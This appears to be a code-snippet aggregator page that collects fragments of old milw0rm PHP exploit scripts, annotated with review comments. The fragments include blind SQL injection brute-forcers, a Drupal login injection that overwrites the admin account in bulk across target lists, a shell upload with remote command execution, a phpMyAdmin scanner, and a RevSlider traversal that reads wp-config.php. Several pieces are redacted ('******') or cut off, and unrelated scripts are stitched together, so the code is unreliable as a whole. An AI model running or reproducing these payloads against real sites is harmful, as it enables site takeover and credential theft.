Esempio n. 1
0
function run($hostname, $path, $username)
{
    // Only the set-up of a per-position recovery loop survives in this excerpt:
    // $key is the hex alphabet of candidate characters, $chr indexes into it and
    // $pos is the character position. None of the three parameters is used in
    // the visible body.
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    // NOTE(review): not valid PHP as printed -- the expression between the two
    // string literals appears to have been redacted by the corpus ("******"),
    // so this function cannot be parsed as shown.
    echo "[+] Password: "******"\n\n";
}
Esempio n. 2
0
function lengthcolumns($hostname, $path, $chs, $goodid)
{
    // Walks candidate lengths 1..20 and stops at the first one for which the
    // page returned by exploit() contains the "javascript:addToCart" marker
    // (the true/false oracle). When none of the 20 matches, the whole process
    // exits. The found length is printed and returned.
    // NOTE(review): each iteration is one request through exploit(), so a run
    // leaves up to 20 near-identical requests from one client in the logs.
    echo "[+] username length: ";
    $chr = 0; // exploit() is always probed with character index 0 here
    $found = 0;
    for ($pos = 1; $found === 0; $pos++) {
        if ($pos > 20) {
            exit("Exploit failed");
        }
        $response = exploit($hostname, $path, $pos, $chr, $chs, $goodid);
        if (preg_match("/javascript:addToCart/i", $response)) {
            $found = $pos;
        }
    }
    echo $found . "\n";
    return $found;
}
    } else {
        $table = "wp_users";
    }
    $host = $argv[1];
    $spos = strpos($host, "http://");
    // strpos() returns false when the scheme is absent; !is_int(false) is true
    // and false == 0 holds under loose comparison, so "http://" is prepended.
    // When the scheme is already at offset 0, is_int(0) is true and $host is
    // left as given. Works, but relies on the false == 0 juggling rule.
    if (!is_int($spos) && $spos == 0) {
        $host = "http://{$host}";
    }
    $path = $argv[2];
    $pageid = (int) $argv[3];
    /* Detecting the version, if possible: read the "Stable tag" line from the
       plugin's readme.txt. This GET is the first request the script makes and
       the one a defender would see in the access log before any injection
       attempt. file_get_contents() returns false on failure; preg_match() then
       finds nothing and the version is reported as not detectable. */
    $version = file_get_contents($host . $path . 'wp-content/plugins/wp-e-commerce/readme.txt');
    preg_match("/Stable tag: (.*)/", $version, $vmatch);
    if (!isset($vmatch[1])) {
        $version = "Not detectable\n";
    } else {
        $version = $vmatch[1];
    }
    echo "Version: " . $version . "\n";
    /* End of version detecting */
    /* Executing exploit: try the configured table name first ($table, set in
       the if/else just above), then a list of common guesses and two variants
       derived from the last two labels of the hostname. */
    preg_match('/[^.]+\\.[^.]+$/', $host, $hmatch);
    $host_name = str_replace('http://', '', $hmatch[0]);
    $tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers', 'wordpressusers', $host_name . '_users', str_replace('.', '', $host_name) . '_users', str_replace('.', '', $host_name) . 'users');
    // One exploit() call per candidate; whatever it returns is echoed
    // unconditionally, even for wrong guesses. $index is unused.
    foreach ($tarray as $index => $val) {
        echo exploit($host, $path, $pageid, $val);
    }
    /*  End of exploit */
    /*  End of exploit */
} else {
    help();
}
Esempio n. 4
0
    if (preg_match("/EXPIERED/", $reply)) {
        return false;
    } else {
        return true;
    }
}
if ($argc != 4) {
    usage();
}
$host = $argv[1];
$path = $argv[2];
$func = $argv[3];
// Candidate alphabet for every position of the value being recovered:
// upper case, lower case and digits -- 62 characters, no punctuation.
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
//add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;
echo "[☢] Creds: ";
// Character-by-character recovery over at most 32 positions: exploit() acts
// as a yes/no oracle for "is $key[$chr] the character at $pos". Every probe
// is one request, so a full run is up to 32 * 62 requests to the same
// endpoint from one client -- a volume and shape that stands out in logs.
// NOTE(review): $chr is never bounded. If no character in $key matches a
// position, $key[$chr] runs past the end of the string (PHP raises a
// notice/warning and yields "") and the loop does not terminate.
while ($pos <= 32) {
    if (exploit($host, $path, $func, $pos, $key[$chr])) {
        echo $key[$chr];
        $chr = 0;
        $pos++;
    } else {
        $chr++;
    }
}
echo "\n";
?>

# milw0rm.com [2009-01-26]
Esempio n. 5
0
    fclose($fp);
    if (preg_match("/\"#FFFFFF\"> em <\\/font>/", $reply)) {
        return false;
    } else {
        return true;
    }
}
if ($argc != 4) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
$username = $argv[3];
// Hex alphabet: 16 candidates per position. Presumably the recovered value
// is a hex-encoded hash -- only the alphabet is visible in this excerpt.
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
// NOTE(review): not valid PHP as printed -- the expression between the two
// string literals appears to have been redacted by the corpus ("******"),
// so the script cannot run as shown.
echo "[+] Password: "******"\n\n";
?>

# milw0rm.com [2009-01-22]
Esempio n. 6
0
    echo "<form method='POST' enctype='multipart/form-data'>\n   <input type='file'name='file' />\n   <input type='submit' value='drupal !' />\n</form>";
    move_uploaded_file($filetmp, $filename);
}
// Silences every warning and notice, including failures of the fopen() and
// file_get_contents() calls below, so a broken run gives no diagnostics.
error_reporting(0);
if (isset($_POST['submit'])) {
    // Declared conditionally: exploit() only exists once the form has been
    // submitted. $url comes straight from the form with no validation.
    function exploit($url)
    {
        // Login POST whose "name" field is submitted as an array whose key
        // carries SQL (UPDATE users ... SET name/pass/status WHERE uid = '1');
        // the pass value is a precomputed "$S$" hash the account is overwritten
        // with. From the detection side, the distinguishing request shape is a
        // POST to /user/login with array-style name[...] keys containing SQL.
        $post_data = "name[0;update users set name %3D 'AnonCoders' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
        $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\n", 'content' => $post_data));
        $ctx = stream_context_create($params);
        // Second argument (use_include_path) is passed as null; newer PHP
        // expects a bool there, so this targets an older runtime. Returns
        // false on failure, which error_reporting(0) hides.
        $data = file_get_contents($url . '/user/login/', null, $ctx);
        // Two success signals: a leaked mb_strlen() type-error message, or the
        // injected names echoed back. && binds tighter than ||, so each side
        // reads as (marker found AND body non-empty).
        if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data || stristr($data, 'FcUk Crap') && $data) {
            // Results are appended to exploited.txt in the web root; the file
            // is linked publicly at the bottom of this page.
            $fp = fopen("exploited.txt", 'a+');
            fwrite($fp, "Exploitied  User: AnonCoders Pass: admin  =====> {$url}/user/login");
            fwrite($fp, "\n");
            fwrite($fp, "--------------------------------------------------------------------------------------------------");
            fwrite($fp, "\n");
            fclose($fp);
            echo "<font color='gold'><b>Success:<font color='red'> AnonCoders</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
        } else {
            echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
        }
    }
    // One target per line of the textarea; trim() also strips the "\r" left
    // by CRLF submissions. The @ on trim() suppresses nothing useful.
    $urls = explode("\n", $_POST['url']);
    foreach ($urls as $url) {
        $url = @trim($url);
        // exploit() prints its own result and returns null, so echo adds nothing.
        echo exploit($url);
    }
}
echo "<br />";
// The closing tag in the literal is misspelled ("</cenrer>"); it is runtime
// output and is left untouched here.
echo '<center><a href="exploited.txt">View Exploited Drupal Sites</a></cenrer>';
Esempio n. 7
0
    if (strlen(trim($x[1])) == 0) {
        return false;
    } else {
        return true;
    }
}
function usage()
{
    // Prints the banner and usage text, then terminates the process. The
    // output is byte-for-byte what the original concatenation produced: each
    // line is preceded by a newline and the text ends with a blank line.
    $lines = array(
        '',
        '[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit',
        '[+] Author: darkjoker',
        '[+] Site  : http://darkjoker.net23.net',
        '[+] Usage : php xpl.php <hostname> <path> <username>',
        '[+] Ex.   : php xpl.php localhost /phpMDJ admin',
    );
    echo implode("\n", $lines), "\n\n";
    exit;
}
if ($argc != 4) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
$user = $argv[3];
// Hex alphabet: 16 candidates per position. Presumably the recovered value
// is a hex-encoded hash -- only the alphabet is visible in this excerpt.
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
// NOTE(review): not valid PHP as printed -- the expression between the two
// string literals appears to have been redacted by the corpus ("******"),
// so the script cannot run as shown.
echo "[+] Password: "******"\n\n";
# milw0rm.com [2009-01-11]
Esempio n. 8
0
// Suppress diagnostics and lift the execution time limit; the 10 s socket
// timeout is the only bound on a connection that hangs.
error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 10);
// Two positional arguments: the target URL and the command to run after the
// upload. There is no argc check, so missing arguments become nulls silently.
$url = $argv[1];
$cmd = $argv[2];
// parse_url() returns false for a malformed URL; every lookup below then
// yields null, hidden by error_reporting(0).
$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) {
    $port = $url_parts['port'];
} else {
    $port = 80;
}
echo "[~] Uploading shell... ";
// exploit() is defined below (cut off in this view) and returns false when
// the socket cannot be opened; any falsy result ends the script. It sends a
// multipart body with a fixed boundary literal ("--------bndry31337"), which
// is a stable marker for request-level detection.
exploit($host, $path, $port) ? print "OK\n" : die("Failed\n");
echo "[~] Executing command... ";
// cmd() is not in this view; a falsy return is treated as failure.
$res = cmd($host, $path, $port, $cmd);
if ($res) {
    // %'-65s pads an empty string to 65 '-' characters, giving a separator
    // line above and below the command output.
    printf("OK\n%'-65s\n%s%'-65s\n", '', $res, '');
} else {
    die("Failed");
}
function exploit($host, $path, $port)
{
    $ock = fsockopen(gethostbyname($host), $port);
    if (!$ock) {
        return false;
    }
    $data = "--------bndry31337\r\n";
    $data .= "Content-Disposition: form-data; ";
Esempio n. 9
0
function GetUser($hostname, $path, $c)
{
    // Issues one probe via exploit() for column ($c - 1) and extracts the
    // first single-quoted value that begins with a digit from the reply.
    // The original wrapped this in a while loop, but both branches return on
    // the first pass, so it is a single request either way.
    $reply = exploit($hostname, $path, 1, $c - 1, 2);
    $match = array();
    if (!preg_match("/\\'\\d(.*?)\\'/i", $reply, $match)) {
        return "Can't Get\r\n";
    }
    return $match[1];
}
Esempio n. 10
0
<?php

#
#   Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
#   Author : cOndemned
#   Note : works only when magic_quotes_gpc = off
#   Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v)
{
    // Builds the cat= parameter with a leading quote, so it only works when
    // magic_quotes_gpc is off (see the header note) -- i.e. when the
    // application drops the raw value into its SQL. $v selects the id to read
    // and the trailing /* comments out the rest of the original query. On the
    // application side, casting cat to int or using a parameterised query
    // removes this injection point entirely.
    $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
    // file() returns the page as an array of lines, or false on failure;
    // count(false) is an Error on PHP 8 (a warning on older runtimes).
    $request = file($target . $injection);
    for ($i = 0; $i < count($request); $i++) {
        // Captures the quoted value the page renders right before </h2>.
        preg_match('/\'(.*)\'<\\/h2>/', $request[$i], $response);
        if (!empty($response[1])) {
            return $response[1] . '<br />';
        }
    }
    // Falls through to an implicit null when nothing matched.
}
#   Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if (empty($_GET['target'])) {
    die('No target site specified!');
} else {
    // $_GET['target'] is used as-is as the base of an outbound file() request;
    // nothing checks that it is even a URL. Reads ids 1 and 2 of
    // gallery_settings, one request each.
    for ($c = 1; $c < 3; $c++) {
        echo exploit($_GET['target'], $c);
    }
}
?>

# milw0rm.com [2008-05-07]
Esempio n. 11
0
    $met = $opts[m];
}
// `o` and `d` are unquoted array keys (bare constants). Older PHP treated an
// undefined constant as its own name with a notice; PHP 8 throws an Error,
// so this block does not run on a current runtime as written.
if ($opts[o]) {
    $file = $opts[o];
}
if ($opts[d]) {
    $dir = $opts[d];
}
// Shared state read by the exploit_* helpers through `global`.
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';
// $forum and $url are assigned earlier in the file (not in this view).
if (!$forum) {
    die("[X] You haven't specified any forum type!\n");
}
echo "[+] Target: {$url} [{$forum}]\n\n";
// exploit() is not visible here; presumably it dispatches to an exploit_*
// routine based on $forum -- verify against the full file.
exploit();
function exploit_gallery($f)
{
    global $cookies, $url, $fld1, $fld2;
    $sql = get_sql($f);
    $str = "NULL," . $fld1 . "," . $fld2 . ",NULL,NULL";
    $req = sprintf($sql, $str);
    $u = $url . "index.php?ind=gallery&op=edit_file&iden=" . urlencode($req);
    $html = Send($u, NULL, $cookies);
    if (strstr($html, "ERROR: Database error")) {
        die("[X] SQL Query Error.. probably wrong table prefix\n");
    } else {
        if (strstr($html, "<title>Error</title>")) {
            die("[X] This method failed. Try something else\n");
        }
    }
Esempio n. 12
0
        $album = $argv[3];
    } else {
        credits();
    }
}
// $album is parsed from argv in the block above (partly outside this view).
$page = 'thumbnails.php?album=' . $album;
// State is handed to the helper functions through $GLOBALS, not parameters.
$GLOBALS['album'] = $album;
echo "[+] Valid album number: " . $album . "\n";
$GLOBALS['cookies'] = getCookie($firstReply);
### get cookie from host -- $firstReply is assumed to be set earlier; TODO confirm
$prefix = getPrefix($GLOBALS['cookies']);
### get cookie prefix
echo "[+] Cookie prefix: " . $prefix . "\n";
$GLOBALS['prefix'] = $prefix;
$etalon = toPage(sendit($page, 'GET', $c_cookies));
### number of images on the reference (etalon) page -- $c_cookies is not defined in this view
$first_sql = '0) UNION SELECT ' . $album . ' AND 1=1/*';
### FIRST sql query - make the valid album invisible
$first_cookie = toCookie($first_sql);
### the probe travels in the cookie (toCookie()), not the query string
if (check($first_cookie) == 0) {
    echo "exploit failed...";
    credits();
}
### if the album is still visible (check() returns 0) the site is not vulnerable
### otherwise read the two columns, one exploit() run each
exploit('name');
exploit('password');
credits();
?>

# milw0rm.com [2008-01-22]
Esempio n. 13
0
function exploit_site($url)
{
    // Fingerprints a phpMyAdmin install with two GETs and, when the heuristic
    // matches, hands off to exploit() (not in this view). Both responses are
    // fetched with headers (CURLOPT_HEADER), so "200 OK" is matched against
    // the status line rather than the body.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    // First probe: the setup script.
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch2, CURLOPT_HEADER, 1);
    curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
    // Second probe: the configuration file under config/.
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    // Heuristic: setup.php answers 200 and mentions "token", and
    // config/config.inc.php answers 200 as well. curl_exec() returns false on
    // a transport error, which preg_match() treats as an empty subject.
    // From the defender's side the exposure is exactly this pair of paths
    // being served; removing or denying the setup script and the config/
    // directory once the install is configured closes it.
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        // Results are appended to pmaPWN.log in the working directory (same
        // text as printed). PHP function names are case-insensitive, so
        // FOpen/FWrite/FClose resolve to fopen/fwrite/fclose.
        $Handlex = FOpen("pmaPWN.log", "a+");
        FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        FClose($Handlex);
        exploit($url);
    } else {
        $Handlex = FOpen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        FClose($Handlex);
    }
}
Esempio n. 14
0
<?php

$target = $argv[1];
// Lower-case constant names (convention is UPPER_SNAKE). Together they form a
// request to admin-ajax.php with action=revslider_show_image and an img value
// that traverses to wp-config.php -- the URL shape a WAF rule or access-log
// search would match on.
define('wp_file', "../wp-config.php");
define('wp_args', "?action=revslider_show_image&img=");
define('wp_path', "/wp-admin/admin-ajax.php");
print "\n[!] Set target > {$target} \n\n";
// parseUrl() is not in this view; presumably it joins $target with the three
// constants above -- verify against the full file.
$url = parseUrl($target);
$init = curl_init($url);
curl_setopt($init, CURLOPT_RETURNTRANSFER, true);
// No explicit CURLOPT_TIMEOUT, so the library default governs a host that
// does not answer.
$data = curl_exec($init);
$code = curl_getinfo($init, CURLINFO_HTTP_CODE);
// A 200 only says the endpoint answered; exploit() (below, cut off in this
// view) decides by looking for DB_ lines in the body. notVuln() is not
// visible here.
if ($code == 200) {
    exploit($data);
} else {
    notVuln();
}
function exploit($data)
{
    $lines = split("\n", $data);
    $rest = array();
    foreach ($lines as $line) {
        $data = split("DB_", $line);
        if (!empty($data[1])) {
            $rest[] = "(DB_" . $data[1] . "\n";
        }
    }
    if (empty($rest)) {
        notVuln();
    } else {
        print "\n[!] VULNERABLE!!!\n\n";
Esempio n. 15
0
function lengthcolumns($hostname, $path, $chs)
{
    // Increments the candidate length from 0 until exploit() reports a hit,
    // then prints and returns it. There is no upper bound here (the other
    // lengthcolumns() in this corpus caps at 20): if exploit() never returns
    // true, the loop does not end.
    echo "[+] username length: ";
    $chr = 0; // character index passed to exploit(); fixed at 0 for the length probe
    $pos = 0;
    while (!exploit($hostname, $path, $pos, $chr, $chs)) {
        $pos++;
    }
    echo $pos . "\n";
    return $pos;
}